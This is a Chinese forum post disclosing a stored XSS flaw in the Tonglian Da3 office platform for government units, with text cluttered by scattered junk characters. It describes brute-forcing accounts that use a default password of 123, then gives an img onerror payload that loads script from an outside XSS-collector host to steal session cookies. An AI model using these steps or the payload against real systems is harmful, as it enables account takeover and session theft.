同联Da3协同办公平台后台通用储存型xss漏洞

admin · 发表于 2018-10-20 20:14:15

+ f3 q+ X# a+ w8 M 同联Da3协同办公平台后台通用储存型xss漏洞1 M/ y7 |0 K' s$ k' V& y/ Z9 {7 N

& }3 y+ W% u5 H9 J 平台简介：* D' \5 f) G6 @- i" {

! H# M- Q. S. v# q" T: P8 J2 @! M 2 q! A; h9 A3 f# _! J3 z/ [0 ^% i

& j" M7 m( @! z0 C 北京同联信息技术有限公司（以下简称同联）由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务，以加强各级政府的精细化、智能化管理，形成高效、敏捷、便民的新型政府。”为使命，致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
0 l' V9 X" l B6 S 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位，分别提供以“移动政务办公”为主的Da3系列管理软件；针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
" g$ E2 g$ ?. T& e同联本着“协作、专业、创新”的工作方针，为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献！ 0 q( d5 p4 B( t* p$ ~

) A- [- O$ }$ q% h) ?( A d4 B3 A! d/ S7 g6 {

! D/ K$ J3 a7 t: g 由于此程序为新开发的程序，故能找到的案例并不多，下面附案例地址：- a3 D( b. }; y' ~$ e) g) Y; s

0 ]9 G; a! \; c# l, A/ e! y/ r# R ) L+ ~9 C/ p! ~' Q w

2 B' D( D5 b( t http://1.1.1.1:7197/cap-aco/#（案例2-）) G- i# T, n; t) [$ f9 F' f

# X9 p- \. P" }( \8 E* f2 l http://www.XXOO.com （案例1-官网网站） 3 b; F+ v6 o: T

( m9 r- u' r( h( }# G8 i' l+ n 漏洞详情: - N1 A+ o- u4 \2 @' H2 X

6 F: r& `, @- D7 ]. t 案例一、 ) B; Z- f) p& R9 H( Q! {

0 k0 T+ t# f4 g q 初步确定平台的默认账号为姓名的首字母小写，初始密码为123，为了能够更好的模拟入侵，使用黑盒测试手段进行测试, n7 ~+ _: ^ j# G* s+ c

8 t0 U. {/ x2 f2 G7 k" P' ~! L8 u# X 首先使用burpsuite代理，然后再用黑客字典生成一个全英文小写的3位字典，利用burpsuite进行暴力破解，破解结果如图： 3 m G7 p- p$ R2 }

) L+ `- w' A0 b + l, c* F! |& p6 e

9 V1 y9 H p+ i- N 3 g. I- c( ~/ X( a9 w- y$ R

0 c8 ^3 a. {6 H3 e- L; I0 e status为302即表示破解成功，然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞，我在编机器里填写好标题、选择人员，点html如图： 5 y. U0 s8 q) g6 {5 I4 b9 a

6 s- h' C2 l, m T; b& a " a( K4 f- G+ F

7 Q3 u5 u* _+ B$ A: A % U* `0 F: \# w( }/ V

" C4 {; x; o- [, z; F 然后插我们的xss跨站代码（经过测试发现过滤了好多标签，比如script，没过滤img、iframe标签），这里我们用img标签来测试，payload如下 1 H1 l) S- t! }' d# Z

, O3 r+ z) N9 `5 V / D7 U3 I3 C% c( `

/ X/ }" u! h0 ~% f, S7 N. R <img src=x8 p+ f" K5 q$ i onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>，如图： ( n: a4 i. r7 S: x. d) W! |

- A9 G$ u5 P: h3 N9 ^) E 9 c! T2 b8 c) R0 s3 `: T

7 L6 K5 o1 {3 ^3 S; s 然后发送，接收cookie如图： " _) p0 H) U2 {2 p- g4 E; `* u

( P2 W" t+ W7 B- A5 ?9 D$ ] $ a S& m9 z3 E- r: M7 Y

3 H$ G# Z0 t: W) D* [ - P4 s$ c, b8 \2 y. T& v6 f

9 ?' X! v& ^) Y8 W: q 7 `" u) J+ U6 Z' u7 g8 `

8 ^3 C3 u$ R# S4 f: N- z ' _( d+ x0 N0 O: t" S8 a

4 c( s) B& s/ u" q8 H # x3 m# y! W/ J' Y

- E$ C; o! R/ @2 @7 p3 {" z! G * |% I- v. R0 v, L! e

7 y2 @, F' t( H" j: q+ X 3 O- b& l" [& e/ F j+ L# k# i4 h

- R5 `& u; B: J5 W/ O( ~9 q, { 案例2、 . z5 {6 w3 }' G* ~$ ~1 s

* V# R1 ]: F' Y- h) C* S7 Q 前面步骤都一样，下面看效果图： 2 y q8 r* @3 F! F0 V# f4 j

* R; i: {5 H0 r' U1 I' A' m" ] * f8 C; F; ^# O; z/ a" E) \

* }0 @2 V, t. R, u * {7 y& u- e* R% _% W% ?& h6 I

& e/ |' }; J, X- c 9 e& f; K5 U$ U4 v( d, I. a+ o! b& j

# v- h M- b8 H% D $ \1 G; E1 ^9 N; k

p3 g- e/ o$ n5 q- ^- W ! `% T, L4 x0 D' |

! R, c, ^9 @3 x* W% D% ~ 5 O4 h2 n) E' k5 l3 Z

9 F6 Y J2 R; v6 [ 8 _8 o0 t# b* |' X2 D

6 r r% }1 _& S8 c9 q \! L' n $ v; W3 I9 ~6 a6 ~+ ^8 y3 N

) E0 N- v _9 X, \ }9 E% M1 M/ v

		自动登录	找回密码
密码			立即注册

同联Da3协同办公平台后台通用储存型xss漏洞

浏览过的版块